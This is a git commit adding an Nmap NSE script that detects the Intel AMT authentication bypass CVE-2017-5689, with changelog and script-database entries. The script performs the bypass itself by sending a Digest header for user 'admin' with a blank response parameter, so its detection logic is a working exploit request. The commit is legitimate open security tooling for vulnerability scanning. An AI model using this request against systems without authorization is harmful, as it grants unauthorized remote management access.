Adds http-vuln-cve2017-5689 to detect vulnerable Intel AMT enabled systems (INTEL-SA-00075). Closes #876

2025-12-06 12:41:29 +00:00 · 2017-05-07 01:33:57 +00:00
parent 6274868dee
commit 7bd54ab098
3 changed files with 130 additions and 0 deletions
--- a/4
+++ b/4
@@ -1,5 +1,9 @@
 # Nmap Changelog ($Id$); -*-text-*-

+o [NSE][GH#876] New script http-vuln-cve2017-5689 detects a privilege escalation 
+  vulnerability (INTEL-SA-00075) in Intel Active Management Technology (AMT)
+  capable systems. [Andrew Orr]
+
 o Extended Memcached service probe and added match for Apache ZooKeeper. 
  [Paulino Calderon]

--- a/scripts/http-vuln-cve2017-5689.nse
+++ b/scripts/http-vuln-cve2017-5689.nse
@@ -0,0 +1,125 @@
+description = [[
+Detects if a system with Intel Active Management Technology is vulnerable to the INTEL-SA-00075 
+privilege escalation vulnerability (CVE2017-5689).
+
+This script determines if a target is vulnerable by attempting to perform digest authentication 
+with a blank response parameter. If the authentication succeeds, a HTTP 200 response is received.
+
+References:
+* https://www.tenable.com/blog/rediscovering-the-intel-amt-vulnerability
+]]
+
+local string = require "string"
+local http = require "http"
+local shortport = require "shortport"
+local vulns = require "vulns"
+local stdnse = require "stdnse"
+
+---
+-- @usage
+-- nmap -p 16992 --script http-vuln-cve2017-5689 <target>
+--
+-- @output
+-- PORT      STATE SERVICE       REASON
+-- 16992/tcp open  amt-soap-http syn-ack
+-- | http-vuln-cve2017-5689:
+-- |   VULNERABLE:
+-- |   Intel Active Management Technology INTEL-SA-00075 Authentication Bypass
+-- |     State: VULNERABLE
+-- |     IDs:  CVE:CVE-2017-5689  BID:98269
+-- |     Risk factor: High  CVSSv2: 10.0 (HIGH) (AV:N/AC:L/AU:N/C:C/I:C/A:C)
+-- |       Intel Active Management Technology is vulnerable to an authentication bypass that
+-- |       can be exploited by performing digest authentication and sending a blank response
+-- |       digest parameter.
+-- |
+-- |     Disclosure date: 2017-05-01
+-- |     References:
+-- |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5689
+-- |       https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00075&languageid=en-fr
+-- |       http://www.securityfocus.com/bid/98269
+-- |       https://www.embedi.com/files/white-papers/Silent-Bob-is-Silent.pdf
+-- |       https://www.embedi.com/news/what-you-need-know-about-intel-amt-vulnerability
+-- |_      https://www.tenable.com/blog/rediscovering-the-intel-amt-vulnerability
+--
+-- @xmloutput
+-- <table key="CVE-2017-5689">
+-- <elem key="title">Intel Active Management Technology INTEL-SA-00075 Authentication Bypass</elem>
+-- <elem key="state">VULNERABLE</elem>
+-- <table key="ids">
+-- <elem>CVE:CVE-2017-5689</elem>
+-- <elem>BID:98269</elem>
+-- </table>
+-- <table key="scores">
+-- <elem key="CVSSv2">10.0 (HIGH) (AV:N/AC:L/AU:N/C:C/I:C/A:C)</elem>
+-- </table>
+-- <table key="description">
+-- <elem>Intel Active Management Technology is vulnerable to an authentication bypass that&#xa;can be 
+-- exploited by performing digest authentication and sending a blank response&#xa;digest parameter.&#xa;
+-- </elem>
+-- </table>
+-- <table key="dates">
+-- <table key="disclosure">
+-- <elem key="month">05</elem>
+-- <elem key="day">01</elem>
+-- <elem key="year">2017</elem>
+-- </table>
+-- </table>
+-- <elem key="disclosure">2017-05-01</elem>
+-- <table key="refs">
+-- <elem>https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00075&amp;languageid=en-fr</elem>
+-- <elem>https://www.embedi.com/files/white-papers/Silent-Bob-is-Silent.pdf</elem>
+-- <elem>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5689</elem>
+-- <elem>https://www.tenable.com/blog/rediscovering-the-intel-amt-vulnerability</elem>
+-- <elem>https://www.embedi.com/news/what-you-need-know-about-intel-amt-vulnerability</elem>
+-- <elem>http://www.securityfocus.com/bid/98269</elem>
+-- </table>
+-- </table>
+---
+
+author = "Andrew Orr"
+license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
+categories = { "vuln", "auth", "exploit" }
+
+portrule = shortport.port_or_service({623, 664, 16992, 16993, 16994, 16995}, "amt-soap-http")
+
+action = function(host, port)
+  local vuln = {
+    title = "Intel Active Management Technology INTEL-SA-00075 Authentication Bypass",
+    state = vulns.STATE.NOT_VULN,
+    risk_factor = "High",
+    scores = {
+      CVSSv2 = "10.0 (HIGH) (AV:N/AC:L/AU:N/C:C/I:C/A:C)",
+    },
+    description = [[
+Intel Active Management Technology is vulnerable to an authentication bypass that
+can be exploited by performing digest authentication and sending a blank response
+digest parameter.
+    ]],
+    IDS = {CVE = "CVE-2017-5689", BID = "98269"},
+    references = {
+      'https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00075&languageid=en-fr',
+      'https://www.embedi.com/news/what-you-need-know-about-intel-amt-vulnerability',
+      'https://www.embedi.com/files/white-papers/Silent-Bob-is-Silent.pdf',
+      'https://www.tenable.com/blog/rediscovering-the-intel-amt-vulnerability'
+    },
+    dates = { disclosure = { year = '2017', month = '05', day = '01' } }
+  }
+
+  local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
+  local response = http.get(host, port, '/index.htm')
+
+  if response.header['server'] and response.header['server']:find('Intel(R) Active Management Technology', 1, true) 
+    and response.status and response.status == 401 then
+      local www_authenticate = http.parse_www_authenticate(response.header['www-authenticate'])
+      local auth_header = string.format("Digest username=\"admin\", realm=\"%s\", nonce=\"%s\", uri=\"index.htm\"," .. 
+                    "cnonce=\"%s\", nc=1, qop=\"auth\", response=\"\"", www_authenticate[1]['params']['realm'],
+                    www_authenticate[1]['params']['nonce'], stdnse.generate_random_string(10))
+      local opt = { header = { ['Authorization'] = auth_header } }
+      response = http.get(host, port, '/index.htm', opt)
+      if response.status and response.status == 200 then
+        vuln.state = vulns.STATE.VULN
+      end
+  end        
+
+  return vuln_report:make_output(vuln)
+end
--- a/scripts/script.db
+++ b/scripts/script.db
@@ -263,6 +263,7 @@ Entry { filename = "http-vuln-cve2014-8877.nse", categories = { "exploit", "intr
 Entry { filename = "http-vuln-cve2015-1427.nse", categories = { "intrusive", "vuln", } }
 Entry { filename = "http-vuln-cve2015-1635.nse", categories = { "safe", "vuln", } }
 Entry { filename = "http-vuln-cve2017-5638.nse", categories = { "vuln", } }
+Entry { filename = "http-vuln-cve2017-5689.nse", categories = { "auth", "exploit", "vuln", } }
 Entry { filename = "http-vuln-misfortune-cookie.nse", categories = { "intrusive", "vuln", } }
 Entry { filename = "http-vuln-wnr1000-creds.nse", categories = { "exploit", "intrusive", "vuln", } }
 Entry { filename = "http-waf-detect.nse", categories = { "discovery", "intrusive", } }